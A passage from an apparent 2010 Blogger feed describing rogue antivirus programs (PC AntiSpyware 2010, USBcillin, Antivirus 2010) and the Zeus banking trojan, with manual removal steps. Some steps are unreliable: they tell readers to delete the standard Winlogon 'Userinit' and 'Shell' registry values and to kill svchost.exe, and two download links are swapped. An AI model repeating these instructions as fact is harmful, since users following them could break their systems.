src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/TDrULYYw9LI/AAAAAAAAAK4/Imu2PzWjeA0/s72-c/realtime.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-3802116405882049376</id><published>2010-07-09T04:45:00.000-07:00</published><updated>2010-07-09T04:45:19.432-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='anti spyware 2010'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><title type='text'>PC AntiSpyware 2010</title><content type='html'>PC AntiSpyware 2010 is a rogue anti-spyware program like Home Antivirus 2010. If it got installed in your PC AntiSpyware 2010 will create numerous harmless files on your computer that will then be displayed as infections when the program scans your computer. These files are named using random characters and are created in various locations on your hard drive. These files are created solely to validate the scan results that state that the infections exist on your computer, when in reality these files cannot harm it.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_mPzqYV2-K04/TDcLtTUiq_I/AAAAAAAAAKw/fUKndFracwk/s1600/PCAS2010.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_mPzqYV2-K04/TDcLtTUiq_I/AAAAAAAAAKw/fUKndFracwk/s320/PCAS2010.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;PC AntiSpyware 2010 will also display a window that impersonates the Microsoft Windows Security Center. The Security center window created by the AntiSpyware 2010 will suggests that you purchase PC AntiSpyware 2010 in order to protect your computer. It will also hijack Internet Explorer so that while you are browsing you will randomly be shown a page stating that the site you are visiting is a security risk. It will then try and sell you PC AntiSpyware 2010 to protect you from this site.&lt;br /&gt;&lt;br /&gt;The number of malware programs that disguise as useful programs are spreading at a increased rate in recent days, thus increasing the number of victims. So one must be watchful in selecting the software that is to be installed in his/her PC.&lt;br /&gt;&lt;br /&gt;Removal: Download the latest version of &lt;a href="http://filehippo.com/download_malwarebytes_anti_malware/"&gt;Malware Bytes Anti Malware&lt;/a&gt; and do a scan, then remove the infected files.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;  &lt;br /&gt;&lt;div&gt;&lt;script type="text/javascript"&gt;var addthis_pub="prabinceal";&lt;/script&gt; &lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border: 0pt none;" width="125" /&gt;&lt;/a&gt;&lt;script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"&gt;&lt;/script&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-3802116405882049376?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/3802116405882049376/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/07/pc-antispyware-2010.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3802116405882049376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/3802116405882049376'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/07/pc-antispyware-2010.html' title='PC AntiSpyware 2010'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_mPzqYV2-K04/TDcLtTUiq_I/AAAAAAAAAKw/fUKndFracwk/s72-c/PCAS2010.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-4405453558499803484</id><published>2010-05-28T10:55:00.000-07:00</published><updated>2010-05-28T10:55:56.052-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='USBcillin'/><title type='text'>USBcillin : Disguised Malware</title><content type='html'>Today I was copying some of the new songs from my brother's computer to my pen drive. When I opened the pen drive in windows explorer, I noticed that a new file called USBcillin in the pen drive. My brother told me that he had installed the program but was unable to uninstall it since it was not shown in the Add or Remove Programs from the control panel. He told me it was not virus. Even though I was&amp;nbsp;suspicious about the&amp;nbsp;reliability of the program I didn't tell him anything. I just removed the program from the start up options in the msconfig file.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_mPzqYV2-K04/TAAC8WqIWFI/AAAAAAAAAKo/sPAr4RlqOTQ/s1600/usbcil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_mPzqYV2-K04/TAAC8WqIWFI/AAAAAAAAAKo/sPAr4RlqOTQ/s320/usbcil.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Now let me give a small information about USBcillin. USBcillin is said to be a software that protects your computer  from malware when you plug in infected USB drives. However, it is just  another rogue application. USBcillin is unable to protect your computer  form any possible infections. The rogue modifies registry entries and  drops various malicious files onto your computer.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Removal:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1. &amp;nbsp;Kill processes&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;13882768.EXE&amp;nbsp;&lt;/li&gt;&lt;li&gt;64080532.EXE&amp;nbsp;&lt;/li&gt;&lt;li&gt;82215601.EXE&amp;nbsp;&lt;/li&gt;&lt;li&gt;USBcillin.exe&amp;nbsp;&lt;/li&gt;&lt;li&gt;QWE.TXT.EXE&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&amp;nbsp;&amp;nbsp; For killing a process, open task manager and then choose the process tab. From the process shown select the above process and click on the end now button. A warning will be displayed. Click OK button. For more details about killing malware process click &lt;a href="http://www.2-spyware.com/news/post203.html"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2. &amp;nbsp;Delete the registry values:&lt;/b&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoPropertiesMyComputer” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\”DisableTaskMgr” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoSetFolders” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoNetHood” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoFolderOptions” = “0″&lt;br /&gt;# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoDesktop” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\”DisableCMD” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoPrinters” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoSetFolders” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\”NoNetSetup” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\”Window Title” = “Windows Internet Explorer”&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\”NoAddPage” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoFind” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify\”PastIconsStream” = “hex:14,00,00,00,05,00,00,00,01,00,01,00,b6,00,00,00,14,00,00,00,49,4c,00,06,b6,00,ba,00,04,00,10,00,10,00,ff,ff,ff,ff,21,00…”&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\”Userinit” = “C:\WINDOWS\system32\userinit.exe,”&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoRun” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\”DisableRegistryTools” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoViewContextMenu” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Uninstall\”NoAddRemovePrograms” = “0″&lt;br /&gt;# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Network\”NoNetSetup” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoFileMenu” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”USBcillin” = “C:\WINDOWS\system32\USBcillin.exe”&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoPropertiesMyComputer” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoViewContextMenu” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\”DisableRegistryTools” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoActiveDesktop” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\”NoAddRemovePrograms” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoFolderOptions” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoDesktop” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\”Shell” = “explorer.exe”&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\”NoDispCPL” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoPrinters” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoControlPanel” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Uninstall\”NoRemovePage” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Uninstall\”NoAddPage” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoFind” = “0″&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\”NoActiveDesktop” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoRun” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoNetHood” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall\”NoRemovePage” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoControlPanel” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\”DisableTaskMgr” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\”NoDispCPL” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\”NoFileMenu” = “0″&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu\”Order” = “hex:08,00,00,00,02,00,00,00,00,02,00,00,01,00,00,00,03,00,00,00,d2,00,00,00,00,00,00,00,c4,00,00,00,41,75,67,4d,02&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To know about deleting registry values, click &lt;a href="http://www.2-spyware.com/news/post226.html"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;3. Delete files&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;64080532.EXE&lt;/li&gt;&lt;li&gt;&amp;nbsp;QWE.TXT.EXE&lt;/li&gt;&lt;li&gt;&amp;nbsp;57273426.SVD&lt;/li&gt;&lt;li&gt;&amp;nbsp;96402658.SVD&lt;/li&gt;&lt;li&gt;&amp;nbsp;71519181.SVD&lt;/li&gt;&lt;li&gt;&amp;nbsp;USBcillin.exe&amp;nbsp;&lt;/li&gt;&lt;li&gt;13882768.EXE&lt;/li&gt;&lt;li&gt;&amp;nbsp;82215601.EXE &amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Delete Directories:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%Temp%\&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;You can also delete USBcillin by using Spyware Doctor. [ &lt;/i&gt;&lt;/b&gt;&lt;a href="http://www.2-spyware.com/download-doctor.php"&gt;&lt;b&gt;&lt;i&gt;Download&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;]&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt; &lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border: 0;" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=186282%26bid=479675" type="text/javascript"&gt;&lt;/script&gt; &lt;br /&gt;&lt;noscript&gt;&lt;a href="http://www.bidvertiser.com/"&gt;pay per click&lt;/a&gt;&lt;/noscript&gt; &lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-4405453558499803484?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/4405453558499803484/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/05/usbcillin-disguised-malware.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4405453558499803484'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/4405453558499803484'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/05/usbcillin-disguised-malware.html' title='USBcillin : Disguised Malware'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_mPzqYV2-K04/TAAC8WqIWFI/AAAAAAAAAKo/sPAr4RlqOTQ/s72-c/usbcil.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-6865507220885031136</id><published>2010-04-22T09:30:00.000-07:00</published><updated>2010-04-22T09:30:05.677-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='virus'/><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><category scheme='http://www.blogger.com/atom/ns#' term='Virus attack'/><category scheme='http://www.blogger.com/atom/ns#' term='Zeus'/><title type='text'>Zeus Virus: Becoming more powerful</title><content type='html'>&amp;nbsp;Zeus virus comes of revision 1.6 with the capability of attacking Firefox and Internet Explorer. A truth that gives a chance for the Google Chrome and Opera users to rejoice.&amp;nbsp;In the 5.5 million computers it has a part in protecting, 1 in each 3000 has become infected. The BBC site informs that not only does Trusteer operate in the U.K, it also is found in the U.S.A.&lt;br /&gt;&lt;br /&gt;Zeus is a financial malware. &amp;nbsp;It infects consumer PCs, waits for them to log onto a list of targeted banks and financial institutions, and then steals their credentials and sends them to a remote server in real time. Additionally, it may inject HTML into the pages rendered by the browser, so that its own content is displayed together (or instead of) the genuine pages from the bank’s web server. Thus, it is able to ask the user to divulge more personal information, such as payment card number and PIN, one time passwords and TANs, etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_mPzqYV2-K04/S9B5UcVuj0I/AAAAAAAAAKg/K0vW8rXWHRM/s1600/zeus.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_mPzqYV2-K04/S9B5UcVuj0I/AAAAAAAAAKg/K0vW8rXWHRM/s320/zeus.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Zues Virus is understood to be the biggest culprit among the family of malware targeting the financial websites and institutions. According to some of the studies, as much as 44% of all financial malware are based upon Zeus.&amp;nbsp;Despite such an alarming state, it is shocking to know that most of the Latest Security Software, &amp;nbsp;even if they are updated to the latest version, &amp;nbsp;are incapable of finding and removing Zeus Malware infections. In a recent study by Trusteer, it has been revealed that as much as as 55% of all the tested 10,000 computers, which were equipped with the latest updated security software and antivirus, were not able to detect and remove the traces of Zeus Virus.&lt;br /&gt;&lt;br /&gt;The malware steals login information by recording keystrokes when the infected user is on a list of target websites.&amp;nbsp;These websites are usually banks and other financial institutions.&amp;nbsp;The user’s data is then sent to a remote server&amp;nbsp;to be used and sold on by cyber-criminals.&amp;nbsp;“We expect this new version of Zeus to significantly increase fraud losses, since nearly 30% of internet users bank online with Firefox and the infection is growing faster than we have ever seen before,” said Amit Klein, chief technology officer at Trusteer.&lt;br /&gt;&lt;br /&gt;For more details on spread of infection visit:&amp;nbsp;&lt;a href="http://thepcsecurity.com/latest-security-software-cannot-detect-zeus-virus/"&gt; thepcsecurity.com/latest-security-software-cannot-detect-zeus-virus/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Removal:&lt;/b&gt;&lt;br /&gt;Run an updated antivirus software capable of detecting Zeus virus. Alternatively an online malware scanner like Trend Micro HouseCall or Windows Live OneCare safety scanner may also be used to scan your system for bot infection. More Online Anti-virus Scanners. Anti-malware softwares like Malware Bytes and Super Anti-Spyware can also be used.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://www.stumbleupon.com/submit?url=http://creatingcomputervirus.blogspot.com/%26title%3DThe%2BArticle%2BTitle"&gt;&lt;img alt="" border="0" src="http://cdn.stumble-upon.com/images/120x20_su_blue.gif" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="http://technorati.com/faves?sub=addfavbtn&amp;amp;add=http://creatingcomputervirus.blogspot.com"&gt;&lt;img alt="Add to Technorati Favorites" src="http://static.technorati.com/pix/fave/tech-fav-1.png" /&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;a href="http://www.addthis.com/bookmark.php" onclick="return addthis_sendto()" onmouseout="addthis_close()" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')"&gt;&lt;img alt="Bookmark and Share" border="0" height="16" src="http://s7.addthis.com/static/btn/lg-share-en.gif" style="border: 0;" width="125" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;script language="JavaScript1.1" src="http://bdv.bidvertiser.com/BidVertiser.dbm?pid=186282%26bid=479675" type="text/javascript"&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;noscript&gt;&lt;a href="http://www.bidvertiser.com/"&gt;pay per click&lt;/a&gt;&lt;/noscript&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/241363155045937421-6865507220885031136?l=creatingcomputervirus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://creatingcomputervirus.blogspot.com/feeds/6865507220885031136/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/04/zeus-virus-becoming-more-powerful.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6865507220885031136'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/241363155045937421/posts/default/6865507220885031136'/><link rel='alternate' type='text/html' href='http://creatingcomputervirus.blogspot.com/2010/04/zeus-virus-becoming-more-powerful.html' title='Zeus Virus: Becoming more powerful'/><author><name>Prabin PB</name><uri>http://www.blogger.com/profile/06628605417419260567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://4.bp.blogspot.com/_mPzqYV2-K04/S1bpilmJVJI/AAAAAAAAAIA/4FN6ahWvfyU/S220/raining.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mPzqYV2-K04/S9B5UcVuj0I/AAAAAAAAAKg/K0vW8rXWHRM/s72-c/zeus.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-241363155045937421.post-7477645293515395927</id><published>2010-03-26T23:47:00.000-07:00</published><updated>2010-03-26T23:47:20.684-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='antivirus 2010'/><category scheme='http://www.blogger.com/atom/ns#' term='symptoms'/><category scheme='http://www.blogger.com/atom/ns#' term='removal'/><title type='text'>Antivirus 2010: Removal</title><content type='html'>&amp;nbsp;Antivirus 2010 is a fake antivirus software which may harm your computer if used. It is a cunning malware that uses advertisements to make the user pay for the malware. It displays fake Blue Screen Of Death (BSOD). In the BSOD it shows that windows has detected unregistered version of the Antivirus 2010. It has to be registered for solving the problem. Do not believe this! It is the cunning task of Antivirus 2010. The BSOD displayed by Antivirus 2010 looks like this:&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_mPzqYV2-K04/S62ZWJCZBCI/AAAAAAAAAKQ/QExVgyIT5-M/s1600/av2010.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_mPzqYV2-K04/S62ZWJCZBCI/AAAAAAAAAKQ/QExVgyIT5-M/s320/av2010.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;If your computer displays above screen, do not trust it and do not pay for Antivirus 2010 malware.&lt;br /&gt;Screenshot of Antivirus 2010 is shown below:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_mPzqYV2-K04/S62gXP8lOKI/AAAAAAAAAKY/cx_8Z5EIOa4/s1600/anti2010.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/_mPzqYV2-K04/S62gXP8lOKI/AAAAAAAAAKY/cx_8Z5EIOa4/s320/anti2010.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Symptoms:&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&lt;/b&gt;&lt;/li&gt;&lt;b&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;Changes browser settings&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;Shows commercial adverts&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;Connects itself to the internet&lt;/span&gt;&lt;/li&gt;&lt;li&gt;S&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;tays resident in background&lt;/span&gt;&lt;/li&gt;&lt;/b&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Removal:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;You can remove Antivirus 2010 by using anti malware softwares like&lt;br /&gt;1. &amp;nbsp;Malware Bytes &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a href="http://filehippo.com/download_windows_defender/"&gt; Download&lt;/a&gt;&lt;br /&gt;2. Windows Defender &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href="http://filehippo.com/download_malwarebytes_anti_malware/"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Manual removal:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;You can delete Antivirus 2010 by following the below steps.&lt;br /&gt;&lt;br /&gt;1. Kill the process 'AV2010.exe svchost.exe wingamma.exe'&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; 